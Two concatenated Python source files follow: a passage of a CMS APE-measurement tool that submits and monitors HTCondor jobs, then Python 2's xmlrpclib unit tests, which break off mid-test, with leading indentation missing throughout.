from autoSubmitterTemplates import condorJobTemplate
jobFileContent = condorJobTemplate.format(base=base, inputFile="$2", inputCommands=inputCommands)
jobFileName = "{}/test/autoSubmitter/workingArea/batchscript_{}_iter{}.tcsh".format(base, self.name,self.curIteration)
with open(jobFileName, "w") as jobFile:
jobFile.write(jobFileContent)
# create a batch job file for each input file
arguments = ""
from autoSubmitterTemplates import condorArgumentTemplate
for i in range(self.dataset.nFiles):
inputFile = self.dataset.fileList[i]
fileNumber = i+1
arguments += condorArgumentTemplate.format(fileNumber=fileNumber, inputFile=inputFile)
# build condor submit script
date = subprocess.check_output(["date", "+%m_%d_%H_%M_%S"]).strip()
sub = "{}/test/autoSubmitter/workingArea/job_{}_iter{}".format(base, self.name, self.curIteration)
errorFileTemp = sub+"_error_{}.txt"
errorFile = errorFileTemp.format("$(ProcId)")
outputFile = sub+"_output_$(ProcId).txt"
logFileTemp= sub+"_condor_{}.log"
logFile = logFileTemp.format("$(ProcId)")
jobFile = sub+".tcsh"
jobName = "{}_{}".format(self.name, self.curIteration)
for i in range(self.dataset.nFiles):
# make file empty if it existed before
with open(logFileTemp.format(i), "w") as fi:
pass
# create submit file
from autoSubmitterTemplates import condorSubTemplate
from autoSubmitterTemplates import condorSubTemplateCAF
if use_caf:
submitFileContent = condorSubTemplateCAF.format(jobFile=jobFileName, outputFile=outputFile, errorFile=errorFile, logFile=logFile, arguments=arguments, jobName=jobName)
else:
submitFileContent = condorSubTemplate.format(jobFile=jobFileName, outputFile=outputFile, errorFile=errorFile, logFile=logFile, arguments=arguments, jobName=jobName)
submitFileName = "{}/test/autoSubmitter/workingArea/submit_{}_jobs_iter{}.sub".format(base, self.name, self.curIteration)
with open(submitFileName, "w") as submitFile:
submitFile.write(submitFileContent)
# submit batch
from autoSubmitterTemplates import submitCondorTemplate
subOut = subprocess.check_output(submitCondorTemplate.format(subFile=submitFileName), shell=True).strip()
if len(subOut) == 0:
print("Running on environment that does not know bsub command or ssh session is timed out (ongoing for longer than 24h?), exiting")
sys.exit()
cluster = subOut.split(" ")[-1][:-1]
for i in range(self.dataset.nFiles):
# list contains condor log files from which to read when job is terminated to detect errors
self.runningJobs.append((logFileTemp.format(i), errorFileTemp.format(i), "{}.{}".format(cluster, i)))
self.status = STATE_BJOBS_WAITING
self.print_status()
def check_jobs(self):
lastStatus = self.status
stillRunningJobs = []
# check all still running jobs
for logName, errName, jobId in self.runningJobs:
# read condor logs instead of doing condor_q or similar, as it is much faster
if not os.path.isfile(logName):
print("{} does not exist even though it should, marking job as failed".format(logName))
self.failedJobs.append( (logName, errName) )
break
with open(logName, "r") as logFile:
log = logFile.read()
if not "submitted" in log:
print("{} was apparently not submitted, did you empty the log file or is condor not working?".format(jobId))
self.failedJobs.append( (logName, errName) )
if "Job was aborted" in log:
print("Job {} of measurement {} in iteration {} was aborted".format(jobId, self.name, self.curIteration))
self.failedJobs.append( (logName, errName) )
elif "Job terminated" in log:
if "Normal termination (return value 0)" in log:
foundErr = False
with open(errName, "r") as err:
for line in err:
if "Fatal Exception" in line.strip():
foundErr = True
break
if not foundErr:
print("Job {} of measurement {} in iteration {} finished successfully".format(jobId, self.name, self.curIteration))
else:
# Fatal error in stderr
print("Job {} of measurement {} in iteration {} has a fatal error, check stderr".format(jobId, self.name, self.curIteration))
self.failedJobs.append( (logName, errName) )
else:
# nonzero return value
print("Job {} of measurement {} in iteration {} failed, check stderr".format(jobId, self.name, self.curIteration))
self.failedJobs.append( (logName, errName) )
else:
stillRunningJobs.append( (logName, errName, jobId) )
self.runningJobs = stillRunningJobs
# at least one job failed
if len(self.failedJobs) > 0:
self.status = STATE_BJOBS_FAILED
self.finishTime = subprocess.check_output(["date"]).strip()
elif len(self.runningJobs) == 0:
self.status = STATE_BJOBS_DONE
print("All condor jobs of APE measurement {} in iteration {} are done".format(self.name, self.curIteration))
# remove files
if delete_logs_after_finish:
submitFile = "{}/test/autoSubmitter/workingArea/submit_{}_jobs_iter{}.sub".format(base, self.name, self.curIteration)
jobFile = "{}/test/autoSubmitter/workingArea/batchscript_{}_iter{}.tcsh".format(base, self.name,self.curIteration)
os.remove(submitFile)
os.remove(jobFile)
for i in range(self.dataset.nFiles):
sub = "{}/test/autoSubmitter/workingArea/job_{}_iter{}".format(base, self.name, self.curIteration)
errorFile = sub+"_error_{}.txt".format(i)
outputFile = sub+"_output_{}.txt".format(i)
logFile = sub+"_condor_{}.log".format(i)
os.remove(errorFile)
os.remove(outputFile)
os.remove(logFile)
if lastStatus != self.status:
self.print_status()
# merges files from jobs
def do_merge(self):
self.status = STATE_MERGE_WAITING
if self.alignment.isDesign:
folderName = '{}/hists/{}/baseline'.format(base, self.name)
else:
folderName = '{}/hists/{}/iter{}'.format(base, self.name, self.curIteration)
# (re)move results from previous measurements before creating folder
if os.path.isdir(folderName):
if os.path.isdir(folderName+"_old"):
shutil.rmtree("{}_old".format(folderName))
os.rename(folderName, folderName+"_old")
os.makedirs(folderName)
# This is so that the structure of the tree can be retrieved by ApeEstimatorSummary.cc and the tree does not have to be rebuilt
if self.curIteration > 0 and not self.alignment.isDesign: # don't have to check for isDesign here because it always ends after iteration 0...
shutil.copyfile('{}/hists/{}/iter{}/allData_iterationApe.root'.format(base, self.name, self.curIteration-1),folderName+"/allData_iterationApe.root")
fileNames = ['{}/hists/{}/{}{}.root'.format(base, self.name, self.dataset.sampleType, str(i)) for i in range(1, self.dataset.nFiles+1)]
fileString = " ".join(fileNames)
from autoSubmitterTemplates import mergeTemplate
merge_result = subprocess.call(mergeTemplate.format(path=folderName, inputFiles=fileString), shell=True) # returns exit code (0 if no error occured)
for name in fileNames:
os.remove(name)
if rootFileValid("{}/allData.root".format(folderName)) and merge_result == 0:
self.status = STATE_MERGE_DONE
else:
self.status = STATE_MERGE_FAILED
self.finishTime = subprocess.check_output(["date"]).strip()
self.print_status()
# calculates APE
def do_summary(self):
self.status = STATE_SUMMARY_WAITING
from autoSubmitterTemplates import summaryTemplate
if self.alignment.isDesign:
#use measurement name as baseline folder name in this case
inputCommands = "iterNumber={} setBaseline={} measurementName={} baselineName={}".format(self.curIteration,self.alignment.isDesign,self.name, self.name)
else:
inputCommands = "iterNumber={} setBaseline={} measurementName={} baselineName={}".format(self.curIteration,self.alignment.isDesign,self.name, self.alignment.baselineDir)
summary_result = subprocess.call(summaryTemplate.format(inputCommands=inputCommands), shell=True) # returns exit code (0 if no error occured)
if summary_result == 0:
self.status = STATE_SUMMARY_DONE
else:
self.status = STATE_SUMMARY_FAILED
self.finishTime = subprocess.check_output(["date"]).strip()
self.print_status()
# saves APE to .db file so it can be read out next iteration
def do_local_setting(self):
self.status = STATE_LOCAL_WAITING
from autoSubmitterTemplates import localSettingTemplate
inputCommands = "iterNumber={} setBaseline={} measurementName={}".format(self.curIteration,self.alignment.isDesign,self.name)
local_setting_result = subprocess.call(localSettingTemplate.format(inputCommands=inputCommands), shell=True) # returns exit code (0 if no error occured)
if local_setting_result == 0:
self.status = STATE_LOCAL_DONE
else:
self.status = STATE_LOCAL_FAILED
self.finishTime = subprocess.check_output(["date"]).strip()
self.print_status()
def finish_iteration(self):
print("APE Measurement {} just finished iteration {}".format(self.name, self.curIteration))
if self.curIteration < self.maxIterations:
self.curIteration += 1
self.status = STATE_ITERATION_START
else:
self.status = STATE_FINISHED
self.finishTime = subprocess.check_output(["date"]).strip()
print("APE Measurement {}, which was started at {} was finished after {} iterations, at {}".format(self.name, self.startTime, self.curIteration, self.finishTime))
def kill(self):
from autoSubmitterTemplates import killJobTemplate
for log, err, jobId in self.runningJobs:
subprocess.call(killJobTemplate.format(jobId=jobId), shell=True)
self.runningJobs = []
self.status = STATE_NONE
def purge(self):
self.kill()
folderName = '{}/hists/{}'.format(base, self.name)
shutil.rmtree(folderName)
# remove log-files as well?
def run_iteration(self):
global threadcounter
global measurements
threadcounter.acquire()
try:
if self.status == STATE_ITERATION_START:
# start bjobs
print("APE Measurement {} just started iteration {}".format(self.name, self.curIteration))
try:
self.submit_jobs()
save("measurements", measurements)
except:
# this is needed in case the scheduler goes down
print("Error submitting jobs for APE measurement {}".format(self.name))
return
if self.status == STATE_BJOBS_WAITING:
# check if bjobs are finished
self.check_jobs()
save("measurements", measurements)
if self.status == STATE_BJOBS_DONE:
# merge files
self.do_merge()
save("measurements", measurements)
if self.status == STATE_MERGE_DONE:
# start summary
self.do_summary()
save("measurements", measurements)
if self.status == STATE_SUMMARY_DONE:
# start local setting (only if not a baseline measurement)
if self.alignment.isDesign:
self.status = STATE_LOCAL_DONE
else:
self.do_local_setting()
save("measurements", measurements)
if self.status == STATE_LOCAL_DONE:
self.finish_iteration()
save("measurements", measurements)
# go to next iteration or finish measurement
if self.status == STATE_BJOBS_FAILED or \
self.status == STATE_MERGE_FAILED or \
self.status == STATE_SUMMARY_FAILED or \
self.status == STATE_LOCAL_FAILED or \
self.status == STATE_INVALID_CONDITIONS or \
self.status == STATE_FINISHED:
with open(history_file, "a") as fi:
fi.write("APE measurement {name} which was started at {start} finished at {end} with state {state} in iteration {iteration}\n".format(name=self.name, start=self.startTime, end=self.finishTime, state=self.get_status(), iteration=self.curIteration))
if self.status == STATE_FINISHED:
global finished_measurements
finished_measurements[self.name] = self
save("finished", finished_measurements)
else:
global failed_measurements
failed_measurements[self.name] = self
self.status = STATE_NONE
save("failed", failed_measurements)
save("measurements", measurements)
if self.status == STATE_ITERATION_START: # this ensures that jobs do not go into idle if many measurements are done simultaneously
# start bjobs
print("APE Measurement {} just started iteration {}".format(self.name, self.curIteration))
self.submit_jobs()
save("measurements", measurements)
finally:
threadcounter.release()
def main():
parser = argparse.ArgumentParser(description="Automatically run APE measurements")
parser.add_argument("-c", "--config", action="append", dest="configs", default=[],
help="Config file that has list of measurements")
parser.add_argument("-k", "--kill", action="append", dest="kill", default=[],
help="List of measurement names to kill (=remove from list and kill all bjobs)")
parser.add_argument("-p", "--purge", action="append", dest="purge", default=[],
help="List of measurement names to purge (=kill and remove folder)")
parser.add_argument("-r", "--resume", action="append", dest="resume", default=[],
help="Resume interrupted APE measurements which are stored in shelves (specify shelves)")
parser.add_argument("-d", "--dump", action="store", dest="dump", default=None,
help='Specify in which .shelve file to store the measurements')
parser.add_argument("-n", "--ncores", action="store", dest="ncores", default=1, type=int,
help='Number of threads running in parallel')
parser.add_argument("-C", "--caf",action="store_true", dest="caf", default=False,
help="Use CAF queue for condor jobs")
args = parser.parse_args()
global base
global clock_interval
global shelve_name
global threadcounter
global lock
global use_caf
use_caf = args.caf
enableCAF(use_caf)
threadcounter = threading.BoundedSemaphore(args.ncores)
lock = threading.Lock()
if args.dump != None: # choose different file than default
shelve_name = args.dump
elif args.resume != []:
shelve_name = args.resume[0]
try:
base = os.environ['CMSSW_BASE']+"/src/Alignment/APEEstimation"
except KeyError:
print("No CMSSW environment was set, exiting")
sys.exit()
killTargets = []
purgeTargets = []
for toConvert in args.kill:
killTargets += replaceAllRanges(toConvert)
for toConvert in args.purge:
purgeTargets += replaceAllRanges(toConvert)
global measurements
measurements = []
global finished_measurements
finished_measurements = {}
global failed_measurements
failed_measurements = {}
if args.resume != []:
for resumeFile in args.resume:
try:
sh = shelve.open(resumeFile)
resumed = sh["measurements"]
resumed_failed = sh["failed"]
resumed_finished = sh["finished"]
sh.close()
for res in resumed:
measurements.append(res)
print("Measurement {} in state {} in iteration {} was resumed".format(res.name, res.get_status(), res.curIteration))
# Killing and purging is done here, because it doesn't make
# sense to kill or purge a measurement that was just started
for to_kill in args.kill:
if res.name == to_kill:
res.kill()
for to_purge in args.purge:
if res.name == to_purge:
res.purge()
failed_measurements.update(resumed_failed)
finished_measurements.update(resumed_finished)
except IOError:
print("Could not resume because {} could not be opened, exiting".format(shelve_name))
sys.exit()
# read out from config file
if args.configs != []:
config = ConfigParser.RawConfigParser()
config.optionxform = str
config.read(args.configs)
# read measurement names
meas = [str(x.split("ape:")[1]) for x in list(config.keys()) if x.startswith("ape:")]
for name in meas:
if name in [x.name for x in measurements]:
print("Error: APE Measurement with name {} already exists, skipping".format(name))
continue
settings = dict(config.items("ape:{}".format(name)))
measurement = ApeMeasurement(name, config, settings)
if measurement.status >= STATE_ITERATION_START and measurement.status <= STATE_FINISHED:
measurements.append(measurement)
print("APE Measurement {} was started".format(measurement.name))
while True:
# remove finished and failed measurements
measurements = [measurement for measurement in measurements if not (measurement.status==STATE_NONE or measurement.status == STATE_FINISHED)]
save("measurements", measurements)
save("failed", failed_measurements)
save("finished", finished_measurements)
list_threads = []
for measurement in measurements:
t = threading.Thread(target=measurement.run_iteration)
list_threads.append(t)
t.start()
# wait for iterations to finish
for t in list_threads:
t.join()
if len(measurements) == 0:
print("No APE measurements are active, exiting")
break
try: # so that interrupting does not give an error message and just ends the program
time_remaining = clock_interval
while time_remaining > 0:
print("Sleeping for {} seconds, you can safely [CTRL+C] now".format(time_remaining))
time.sleep(1)
time_remaining -= 1
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
print("")
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
except KeyboardInterrupt:
sys.exit(0)
if __name__ == "__main__":
main()
|
test_xmlrpc.py
|
import base64
import datetime
import sys
import time
import unittest
import xmlrpclib
import SimpleXMLRPCServer
import threading
import mimetools
import httplib
import socket
import StringIO
import os
from test import test_support
try:
unicode
except NameError:
have_unicode = False
else:
have_unicode = True
alist = [{'astring': 'foo@bar.baz.spam',
'afloat': 7283.43,
'anint': 2**20,
'ashortlong': 2L,
'anotherlist': ['.zyx.41'],
'abase64': xmlrpclib.Binary("my dog has fleas"),
'boolean': xmlrpclib.False,
'unicode': u'\u4000\u6000\u8000',
u'ukey\u4000': 'regular value',
'datetime1': xmlrpclib.DateTime('20050210T11:41:23'),
'datetime2': xmlrpclib.DateTime(
(2005, 02, 10, 11, 41, 23, 0, 1, -1)),
'datetime3': xmlrpclib.DateTime(
datetime.datetime(2005, 02, 10, 11, 41, 23)),
}]
class XMLRPCTestCase(unittest.TestCase):
def test_dump_load(self):
self.assertEquals(alist,
xmlrpclib.loads(xmlrpclib.dumps((alist,)))[0][0])
def test_dump_bare_datetime(self):
# This checks that an unwrapped datetime.date object can be handled
# by the marshalling code. This can't be done via test_dump_load()
# since with use_datetime set to 1 the unmarshaller would create
# datetime objects for the 'datetime[123]' keys as well
dt = datetime.datetime(2005, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEquals(newdt, dt)
self.assertEquals(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEquals(newdt, xmlrpclib.DateTime('20050210T11:41:23'))
def test_datetime_before_1900(self):
# same as before but with a date before 1900
dt = datetime.datetime(1, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEquals(newdt, dt)
self.assertEquals(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEquals(newdt, xmlrpclib.DateTime('00010210T11:41:23'))
def test_cmp_datetime_DateTime(self):
now = datetime.datetime.now()
dt = xmlrpclib.DateTime(now.timetuple())
self.assert_(dt == now)
self.assert_(now == dt)
then = now + datetime.timedelta(seconds=4)
self.assert_(then >= dt)
self.assert_(dt < then)
def test_bug_1164912 (self):
d = xmlrpclib.DateTime()
((new_d,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((d,),
methodresponse=True))
self.assert_(isinstance(new_d.value, str))
# Check that the output of dumps() is still an 8-bit string
s = xmlrpclib.dumps((new_d,), methodresponse=True)
self.assert_(isinstance(s, str))
def test_newstyle_class(self):
class T(object):
pass
t = T()
t.x = 100
t.y = "Hello"
((t2,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((t,)))
self.assertEquals(t2, t.__dict__)
def test_dump_big_long(self):
self.assertRaises(OverflowError, xmlrpclib.dumps, (2L**99,))
def test_dump_bad_dict(self):
self.assertRaises(TypeError, xmlrpclib.dumps, ({(1,2,3): 1},))
def test_dump_recursive_seq(self):
l = [1,2,3]
t = [3,4,5,l]
l.append(t)
self.assertRaises(TypeError, xmlrpclib.dumps, (l,))
def test_dump_recursive_dict(self):
d = {'1':1, '2':1}
t = {'3':3, 'd':d}
d['t'] = t
self.assertRaises(TypeError, xmlrpclib.dumps, (d,))
def test_dump_big_int(self):
if sys.maxint > 2L**31-1:
self.assertRaises(OverflowError, xmlrpclib.dumps,
(int(2L**34),))
xmlrpclib.dumps((xmlrpclib.MAXINT, xmlrpclib.MININT))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MAXINT+1,))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MININT-1,))
def dummy_write(s):
pass
m = xmlrpclib.Marshaller()
m.dump_int(xmlrpclib.MAXINT, dummy_write)
m.dump_int(xmlrpclib.MININT, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MAXINT+1, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MININT-1, dummy_write)
def test_dump_none(self):
value = alist + [None]
arg1 = (alist + [None],)
strg = xmlrpclib.dumps(arg1, allow_none=True)
self.assertEquals(value,
xmlrpclib.loads(strg)[0][0])
self.assertRaises(TypeError, xmlrpclib.dumps, (arg1,))
def test_default_encoding_issues(self):
# SF bug #1115989: wrong decoding in '_stringify'
utf8 = """<?xml version='1.0' encoding='iso-8859-1'?>
<params>
<param><value>
<string>abc \x95</string>
</value></param>
<param><value>
<struct>
<member>
<name>def \x96</name>
<value><string>ghi \x97</string></value>
</member>
</struct>
</value></param>
</params>
"""
# sys.setdefaultencoding() normally doesn't exist after site.py is
# loaded. reload(sys) is the way to get it back.
old_encoding = sys.getdefaultencoding()
setdefaultencoding_existed = hasattr(sys, "setdefaultencoding")
reload(sys) # ugh!
sys.setdefaultencoding("iso-8859-1")
try:
(s, d), m = xmlrpclib.loads(utf8)
finally:
sys.setdefaultencoding(old_encoding)
if not setdefaultencoding_existed:
del sys.setdefaultencoding
items = d.items()
if have_unicode:
self.assertEquals(s, u"abc \x95")
self.assert_(isinstance(s, unicode))
self.assertEquals(items, [(u"def \x96", u"ghi \x97")])
self.assert_(isinstance(items[0][0], unicode))
self.assert_(isinstance(items[0][1], unicode))
else:
self.assertEquals(s, "abc \xc2\x95")
self.assertEquals(items, [("def \xc2\x96", "ghi \xc2\x97")])
class HelperTestCase(unittest.TestCase):
def test_escape(self):
self.assertEqual(xmlrpclib.escape("a&b"), "a&b")
self.assertEqual(xmlrpclib.escape("a<b"), "a<b")
self.assertEqual(xmlrpclib.escape("a>b"), "a>b")
class FaultTestCase(unittest.TestCase):
def test_repr(self):
f = xmlrpclib.Fault(42, 'Test Fault')
self.assertEqual(repr(f), "<Fault 42: 'Test Fault'>")
self.assertEqual(repr(f), str(f))
def test_dump_fault(self):
f = xmlrpclib.Fault(42, 'Test Fault')
s = xmlrpclib.dumps((f,))
(newf,), m = xmlrpclib.loads(s)
self.assertEquals(newf, {'faultCode': 42, 'faultString': 'Test Fault'})
self.assertEquals(m, None)
s = xmlrpclib.Marshaller().dumps(f)
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, s)
class DateTimeTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.DateTime()
def test_time(self):
d = 1181399930.036952
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", time.localtime(d)))
def test_time_tuple(self):
d = (2007,6,9,10,38,50,5,160,0)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070609T10:38:50')
def test_time_struct(self):
d = time.localtime(1181399930.036952)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", d))
def test_datetime_datetime(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070102T03:04:05')
def test_repr(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
val ="<DateTime '20070102T03:04:05' at %x>" % id(t)
self.assertEqual(repr(t), val)
def test_decode(self):
d = ' 20070908T07:11:13 '
t1 = xmlrpclib.DateTime()
t1.decode(d)
tref = xmlrpclib.DateTime(datetime.datetime(2007,9,8,7,11,13))
self.assertEqual(t1, tref)
t2 = xmlrpclib._datetime(d)
self.assertEqual(t1, tref)
class BinaryTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.Binary()
self.assertEqual(str(t), '')
def test_string(self):
d = '\x01\x02\x03abc123\xff\xfe'
t = xmlrpclib.Binary(d)
self.assertEqual(str(t), d)
def test_decode(self):
d = '\x01\x02\x03abc123\xff\xfe'
de = base64.encodestring(d)
t1 = xmlrpclib.Binary()
t1.decode(de)
self.assertEqual(str(t1), d)
t2 = xmlrpclib._binary(de)
self.assertEqual(str(t2), d)
ADDR = PORT = URL = None
# The evt is set twice. First when the server is ready to serve.
# Second when the server has been shutdown. The user must clear
# the event after it has been set the first time to catch the second set.
def http_server(evt, numrequests):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
def my_function():
'''This is my function'''
return True
class MyXMLRPCServer(SimpleXMLRPCServer.SimpleXMLRPCServer):
def get_request(self):
# Ensure the socket is always non-blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
serv = MyXMLRPCServer(("localhost", 0),
logRequests=False, bind_and_activate=False)
try:
serv.socket.settimeout(3)
serv.server_bind()
global ADDR, PORT, URL
ADDR, PORT = serv.socket.getsockname()
#connect to IP address directly. This avoids socket.create_connection()
#trying to connect to to "localhost" using all address families, which
#causes slowdown e.g. on vista which supports AF_INET6. The server listens
#on AF_INET only.
URL = "http://%s:%d"%(ADDR, PORT)
serv.server_activate()
serv.register_introspection_functions()
serv.register_multicall_functions()
serv.register_function(pow)
serv.register_function(lambda x,y: x+y, 'add')
serv.register_function(my_function)
serv.register_instance(TestInstanceClass())
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
# This function prevents errors like:
# <ProtocolError for localhost:57527/RPC2: 500 Internal Server Error>
def is_unavailable_exception(e):
'''Returns True if the given ProtocolError is the product of a server-side
exception caused by the 'temporarily unavailable' response sometimes
given by operations on non-blocking sockets.'''
# sometimes we get a -1 error code and/or empty headers
try:
if e.errcode == -1 or e.headers is None:
return True
exc_mess = e.headers.get('X-exception')
except AttributeError:
# Ignore socket.errors here.
exc_mess = str(e)
if exc_mess and 'temporarily unavailable' in exc_mess.lower():
return True
return False
# NOTE: The tests in SimpleServerTestCase will ignore failures caused by
# "temporarily unavailable" exceptions raised in SimpleXMLRPCServer. This
# condition occurs infrequently on some platforms, frequently on others, and
# is apparently caused by using SimpleXMLRPCServer with a non-blocking socket.
# If the server class is updated at some point in the future to handle this
# situation more gracefully, these tests should be modified appropriately.
class SimpleServerTestCase(unittest.TestCase):
def setUp(self):
# enable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, 1)
threading.Thread(target=http_server, args=serv_args).start()
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# disable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
def test_simple1(self):
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
# [ch] The test 404 is causing lots of false alarms.
def XXXtest_404(self):
# send POST with httplib, it should return 404 header and
# 'Not Found' message.
conn = httplib.HTTPConnection(ADDR, PORT)
conn.request('POST', '/this-is-not-valid')
response = conn.getresponse()
conn.close()
self.assertEqual(response.status, 404)
self.assertEqual(response.reason, 'Not Found')
def test_introspection1(self):
try:
p = xmlrpclib.ServerProxy(URL)
meth = p.system.listMethods()
expected_methods = set(['pow', 'div', 'my_function', 'add',
'system.listMethods', 'system.methodHelp',
'system.methodSignature', 'system.multicall'])
self.assertEqual(set(meth), expected_methods)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection2(self):
try:
# test _methodHelp()
p = xmlrpclib.ServerProxy(URL)
divhelp = p.system.methodHelp('div')
self.assertEqual(divhelp, 'This is the div function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection3(self):
try:
# test native doc
p = xmlrpclib.ServerProxy(URL)
myfunction = p.system.methodHelp('my_function')
self.assertEqual(myfunction, 'This is my function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection4(self):
# the SimpleXMLRPCServer doesn't support signatures, but
# at least check that we can try making the call
try:
p = xmlrpclib.ServerProxy(URL)
divsig = p.system.methodSignature('div')
self.assertEqual(divsig, 'signatures not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.add(2,3)
multicall.pow(6,8)
multicall.div(127,42)
add_result, pow_result, div_result = multicall()
self.assertEqual(add_result, 2+3)
self.assertEqual(pow_result, 6**8)
self.assertEqual(div_result, 127//42)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_non_existing_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.this_is_not_exists()
result = multicall()
# result.results contains;
# [{'faultCode': 1, 'faultString': '<type \'exceptions.Exception\'>:'
# 'method "this_is_not_exists" is not supported'>}]
self.assertEqual(result.results[0]['faultCode'], 1)
self.assertEqual(result.results[0]['faultString'],
'<type \'exceptions.Exception\'>:method "this_is_not_exists" '
'is not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_dotted_attribute(self):
# Raises an AttributeError because private methods are not allowed.
self.assertRaises(AttributeError,
SimpleXMLRPCServer.resolve_dotted_attribute, str, '__add')
self.assert_(SimpleXMLRPCServer.resolve_dotted_attribute(str, 'title'))
# Get the test to run faster by sending a request with test_simple1.
# This avoids waiting for the socket timeout.
self.test_simple1()
# This is a contrived way to make a failure occur on the server side
# in order to test the _send_traceback_header flag on the server
class FailingMessageClass(mimetools.Message):
def __getitem__(self, key):
key = key.lower()
if key == 'content-length':
return 'I am broken'
return mimetools.Message.__getitem__(self, key)
class FailingServerTestCase(unittest.TestCase):
def setUp(self):
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, 1)
threading.Thread(target=http_server, args=serv_args).start()
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# reset flag
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
# reset message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = mimetools.Message
def test_basic(self):
# check that flag is false by default
flagval = SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header
self.assertEqual(flagval, False)
# enable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
# test a call that shouldn't fail just as a smoke test
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_fail_no_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# The two server-side error headers shouldn't be sent back in this case
self.assertTrue(e.headers.get("X-exception") is None)
self.assertTrue(e.headers.get("X-traceback") is None)
else:
self.fail('ProtocolError not raised')
def test_fail_with_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
# Check that errors in the server send back exception/traceback
# info when flag is set
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# We should get error info in the response
